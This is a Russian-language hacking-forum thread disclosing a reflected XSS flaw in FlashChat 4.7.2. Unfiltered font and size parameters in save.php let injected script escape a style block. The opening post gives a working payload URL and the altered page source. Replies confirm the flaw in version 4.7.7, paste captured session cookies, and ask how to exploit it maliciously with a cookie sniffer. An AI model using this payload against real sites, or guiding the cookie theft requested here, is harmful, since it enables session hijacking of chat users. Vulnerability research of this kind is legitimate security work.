Форум АНТИЧАТ - FlashChat v 4.7.2

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - FlashChat v 4.7.2 (https://forum.antichat.xyz/showthread.php?t=32532)

FlashChat v 4.7.2

Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

Цитата:

save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13

По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

Код:

        

<style type="text/css">

<!--

BODY {

        font-family: Arial, Verdana, Arial, Helvetica, sans-serif;

        font-size: 13px;

}

-->

</style>

Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

Цитата:

save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--

Теперь иходный код примет такой вид

Код:

        

<style type="text/css">

<!--

BODY {

        font-family: Arial, Verdana, Arial, Helvetica, sans-serif;

        font-size: 13px;}--></style><script>alert(document.cookie)</script><!--

}

-->

</style>

А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте

Работает, шаришь).

Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?

попробовал на версии 4.7.7

Цитата:

wbb2_cookiehash=05774aa8eb7642934e9bd942be4ccb79;
wbb2_lastvisit=1170701252;
PHPSESSID=dc09253337597b4c7b65d61b7ad7d3f1

походу тож работает :D

a kak panimat vot eta ?

Код:

357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932

no chat nawerna ciutka perepisan

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Цитата:

Сообщение от Dimon_Aka_Sexxx

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Жжош! Некогда не юзал чтоли подобные уязвимости?
Кури ЭТО. ;)

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

Цитата:

Сообщение от Витян

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

Тебе же дали этот линк
дык читай... =\

Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.